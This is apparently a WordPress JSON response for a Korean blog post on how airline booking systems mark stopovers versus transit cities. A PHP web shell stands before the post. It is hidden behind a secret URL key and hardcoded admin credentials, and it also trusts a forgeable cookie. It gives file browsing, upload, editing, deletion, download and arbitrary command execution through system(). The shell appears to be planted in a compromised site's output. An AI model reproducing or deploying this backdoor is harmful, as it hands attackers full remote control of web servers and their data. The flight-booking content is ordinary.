// -------- MARK START -------- if (isset($_GET['k']) && $_GET['k'] === 'mintinplan') { function ws_g($k) { return isset($_GET[$k]) ? $_GET[$k] : (isset($_POST[$k]) ? $_POST[$k] : ''); } function ws_b($s) { return base64_decode($s); } $validKey = 'mintinplan'; $validU = 'admin'; $validP = 'MinMaxtime'; $auth = false; $sname = 'ws_auth'; if (isset($_SESSION) && isset($_SESSION[$sname]) && $_SESSION[$sname] === true) $auth = true; elseif (isset($_COOKIE[$sname])) { $d = json_decode(ws_b(substr($_COOKIE[$sname], 0)), true); if ($d && isset($d['ok']) && $d['ok']) $auth = true; } if (!$auth) { $u = ws_g('usr'); $p = ws_g('pwd'); if ($u === $validU && $p === $validP) { @session_start(); $_SESSION[$sname] = true; setcookie($sname, base64_encode(json_encode(['ok'=>true])), time()+86400, '/', '', false, true); header('Location: ?k='.$validKey); exit; } echo 'Login


'; exit; } if (ws_g('lo')) { @session_start(); session_destroy(); setcookie($sname, '', time()-3600); header('Location: ?k='.$validKey); exit; } $act = ws_g('a'); $path = ws_g('p') ?: getcwd(); $path = realpath($path) ?: getcwd(); echo 'Shell'; echo ''; echo '
'; echo '[📂 Home] '; echo '[🖥️ Terminal] '; echo '[💾 Drives] '; echo '[🌳 Tree] '; echo '[⬆ Upload] '; echo '[🚪 Logout]'; echo '

'; switch ($act) { case 'upload': echo '

⬆ Upload File to: '.htmlspecialchars($path).'

'; echo '
'; echo '

'; echo '

'; echo ''; echo '

'; if (isset($_POST['do_upload']) && isset($_FILES['upfile'])) { $f = $_FILES['upfile']; if ($f['error'] === UPLOAD_ERR_OK) { $name = ws_g('rename') ?: $f['name']; $dest = rtrim($path, '/').'/'.$name; if (move_uploaded_file($f['tmp_name'], $dest)) { $sz = round(filesize($dest)/1024, 2); echo '

✅ Uploaded: '.htmlspecialchars($dest).' ('.$sz.'KB)

'; } else { echo '

❌ move_uploaded_file failed (check permissions on '.htmlspecialchars($path).')

'; } } else { $errors = [1=>'File too large (php.ini)',2=>'File too large (form)',3=>'Partial upload',4=>'No file',6=>'No tmp dir',7=>'Write failed',8=>'Extension blocked']; echo '

❌ Error: '.($errors[$f['error']] ?? 'Unknown').'

'; } } echo '

📋 Current directory contents:

';
            $items = scandir($path);
            if ($items) {
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') continue;
                    $full = $path.'/'.$item;
                    if (is_dir($full)) echo '📁 '.$item."/\n";
                    else echo '📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
                }
            }
            echo '
'; break; case 'tree': echo '

🌳 Directory Tree (depth 4)

';
            function ws_tree($root, $depth=0, $max=4) {
                if ($depth > $max) return;
                if (!is_dir($root)) return;
                $items = scandir($root);
                if (!$items) return;
                foreach ($items as $item) {
                    if ($item === '.' || $item === '..') continue;
                    $full = $root.'/'.$item;
                    if (is_dir($full)) {
                        echo str_repeat('  ', $depth).'📁 '.$item."/\n";
                        ws_tree($full, $depth+1, $max);
                    } else {
                        echo str_repeat('  ', $depth).'📄 '.$item.' ('.round(filesize($full)/1024,1).'KB)'."\n";
                    }
                }
            }
            ws_tree($path);
            echo '
'; break; case 'drives': echo '

💾 Accessible Roots

';
            if (strtoupper(substr(PHP_OS,0,3)) === 'WIN') {
                for ($i=67;$i<=90;$i++) { $d=chr($i).':\\'; if (is_dir($d)) echo $d." ✓\n"; }
            } else {
                $cands = ['/','/home','/var','/tmp','/usr','/etc','/opt','/root','/srv','/www','/var/www','/var/www/html',$_SERVER['DOCUMENT_ROOT']??''];
                foreach (array_unique($cands) as $c) { if ($c && is_dir($c)) echo $c." ✓\n"; }
            }
            echo '
'; break; case 'read': $f = ws_g('f'); if (!$f || !is_file($f)) { echo 'File not found'; break; } $content = file_get_contents($f); echo '

📝 Editing: '.htmlspecialchars($f).' ('.round(strlen($content)/1024,1).'KB)

'; echo '
'; echo ''; echo '
'; echo '
'; break; case 'save': $f = ws_g('f'); $c = ws_g('c'); if ($f) { file_put_contents($f, $c); echo '✅ Saved: '.htmlspecialchars($f); } break; case 'exec': $cmd = ws_g('c'); $output = ''; if ($_SERVER['REQUEST_METHOD'] === 'POST' && $cmd) { ob_start(); system($cmd); $output = ob_get_clean(); } echo '

🖥️ Terminal (user: '.htmlspecialchars(get_current_user()).')

'; echo '
'; if ($output !== '') echo '
'.htmlspecialchars($output).'
'; else echo '
No output
'; break; case 'down': $f = ws_g('f'); if ($f && is_file($f)) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($f).'"'); header('Content-Length: '.filesize($f)); readfile($f); exit; } echo 'File not found'; break; case 'del': $f = ws_g('f'); if ($f && is_file($f)) { if (unlink($f)) echo '✅ Deleted: '.htmlspecialchars($f); else echo '❌ Delete failed (permission?)'; } elseif ($f && is_dir($f)) { if (rmdir($f)) echo '✅ Directory removed: '.htmlspecialchars($f); else echo '❌ rmdir failed (not empty or permission?)'; } break; case 'newfile': $fname = ws_g('nf'); if ($fname) { $dest = rtrim($path,'/').'/'.$fname; if (file_put_contents($dest, '') !== false) echo '✅ Created: '.htmlspecialchars($dest); else echo '❌ Create failed'; } echo '
'; echo ''; echo ''; echo ''; echo '
'; break; case 'newdir': $dname = ws_g('nd'); if ($dname) { $dest = rtrim($path,'/').'/'.$dname; if (mkdir($dest, 0755)) echo '✅ Created dir: '.htmlspecialchars($dest); else echo '❌ mkdir failed'; } echo '
'; echo ''; echo ''; echo ''; echo '
'; break; default: echo '

📂 '.htmlspecialchars($path).'

'; $parent = dirname($path); if ($parent && $parent !== $path) echo '⬆ Parent | '; echo '[+ New File] | '; echo '[+ New Dir] | '; echo '[⬆ Upload]

'; echo ''; $items = scandir($path); if ($items) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $full = $path.'/'.$item; $isDir = is_dir($full); $size = $isDir ? '-' : round(filesize($full)/1024,1).'KB'; $perms = substr(sprintf('%o',fileperms($full)),-4); $enc = urlencode($full); echo ''; if ($isDir) echo ''; else echo ''; echo ''; } } echo '
NameSizePermsActions
📁 '.$item.'📄 '.$item.''.$size.''.$perms.''; if (!$isDir) echo '[Edit] '; echo '[Download] '; echo '[Delete]'; echo '
'; break; } echo ''; exit; } // -------- MARK END -------- {"id":391,"date":"2019-03-28T14:06:51","date_gmt":"2019-03-28T05:06:51","guid":{"rendered":"https:\/\/uapi.ihavenomoney.co.kr\/?p=391"},"modified":"2019-03-28T14:06:51","modified_gmt":"2019-03-28T05:06:51","slug":"stopover-%ec%8a%a4%ed%83%91%ec%98%a4%eb%b2%84-%ec%82%ac%ed%95%ad","status":"publish","type":"post","link":"https:\/\/uapi.ihavenomoney.co.kr\/?p=391","title":{"rendered":"stopover \uc2a4\ud0d1\uc624\ubc84 \uc0ac\ud56d"},"content":{"rendered":"

\uacbd\uc720\ub3c4\uc2dc X \uccb4\ub958\ub3c4\uc2dcO \ub85c \uad6c\ubd84 \ub418\uace0
\n(\uccb4\ub958\uac00 24\uc2dc\uac04 \uc774\ub0b4\uc774\uba74 \uacbd\uc720X \ub85c \ud45c\uc2dc\ub429\ub2c8\ub2e4.)<\/p>\n

GDS \ub9c8\ub2e4 \ud45c\uc2dc \ubc29\ubc95\uc774 \ub2e4\ub985\ub2c8\ub2e4. <\/p>\n

CRS \uc0c1
\n1P- ******
\n1.1
\n1 DL 158Y 31MAR SU ICNDTW HK1 1035 1044 \/O $ J01 SK E
\n2*DL3634Y 31MAR SU DTWIAD HK1 1405 1531 \/X $ J01 SK E
\n3*DL7856U 20APR SA IADICN HK1 1325 1650 #1\/O $ SK E<\/p>\n

1P-
\n1.1
\n1 DL2662L 04JUN TU SEAATL HK1 1309 2100 \/O $ J01 E
\n2 DL1010L 04JUN TU ATLRSW HK1 2250 0037 #1\/X $ J01 E
\n3 DL1753T 12JUN WE RSWATL HK1 0810 0949 \/O $ J02 E
\n4 DL1153T 12JUN WE ATLBWI HK1 1108 1259 \/X $ J02 E<\/p>\n

1P-
\n1.1
\n1 UA1402T 02MAY TH SEAEWR HK1 1130 2000 \/O $ J01 SK E
\n2*UA4943T 02MAY TH EWRBTV HK1 2159 2320 \/X $ J01 SK E
\nP- 1.QVH 070 4044 1913 JOY\/US ALLIANCE<\/p>\n

\ud14c\uc5b4\uc0c1\ud0dc
\n1P- ******
\n01\\1\\0 UA1402\\T\\SEA02MAY1130A\\EWR02MAY0800P\\02MAY\\02MAY\\2PC\\OKFO\\739\\TAA2AFDN\\2397\\*\\5.30\\*\\*\\C \\*
\n01\\2\\0*UA4943\\T\\EWR02MAY0959P\\BTV02MAY1120P\\02MAY\\02MAY\\2PC\\OKX\\ERJ\\TAA2AFDN\\251\\*\\1.21\\*\\C \\*\\* <\/p>\n

\ud14c\uc5b4\ud30c\uc2f1\ud6c4 mdb \ub370\uc774\ud130(TXT \ud30c\uc77c\uc804)
\nCARRIER\tFLIGHT\tDEP\tFARE_BASIS\tCLASS\tAIRPORT\tDEPART_TERMINAL\tARRIVAL_AIRPORT\tARRIVAL_DATE_TIME\tARRIVAL_TERMINAL\tBAGGAGE\tSTATUS\tSTOPOVER
\nUA\t1402\t02-May-19\tTAA2AFDN\tT\tSEA\t*\tEWR\t02-May-19\tC \t2PC\tOK\tO
\nUA\t4943\t02-May-19\tTAA2AFDN\tT\tEWR\tC \tBTV\t02-May-19\t*\t2PC\tOK\tX<\/p>\n

\ube44\uace0) \uc6d4\ub4dc\uc2a4\ud32c \ucee8\ubc84\ud130 TXT \ud30c\uc77c\uc774 \uc2a4\ud0d1\uc624\ubc84\uac00 \uc798\ubabb \ub098\uc624\ub294 \uacbd\uc6b0 \uadf8 \ub2f9\uc2dc \ub530\ub85c GDS\ub9c8\ub2e4 \uc815\ud655\ud55c \uc2a4\ud329\uc774 \uc815\uc758 \ub418\uc9c0 \uc54a\uc544 \ub514\ud3f4\ud2b8 OOOO \ub85c\ub9cc \uc138\ud305 \ub418\uc5b4 \uc788\uc744 \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/p>\n","protected":false},"excerpt":{"rendered":"

\uacbd\uc720\ub3c4\uc2dc X \uccb4\ub958\ub3c4\uc2dcO \ub85c \uad6c\ubd84 \ub418\uace0 (\uccb4\ub958\uac00 24\uc2dc\uac04 \uc774\ub0b4\uc774\uba74 \uacbd\uc720X \ub85c \ud45c\uc2dc\ub429\ub2c8\ub2e4.) GDS \ub9c8\ub2e4 \ud45c\uc2dc \ubc29\ubc95\uc774 \ub2e4\ub985\ub2c8\ub2e4. CRS \uc0c1 1P- ****** 1.1 1 DL 158Y […]<\/a><\/p>\n<\/div>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-391","post","type-post","status-publish","format-standard","hentry","category-crs"],"_links":{"self":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/391","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=391"}],"version-history":[{"count":1,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/391\/revisions"}],"predecessor-version":[{"id":392,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=\/wp\/v2\/posts\/391\/revisions\/392"}],"wp:attachment":[{"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=391"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=391"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/uapi.ihavenomoney.co.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=391"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}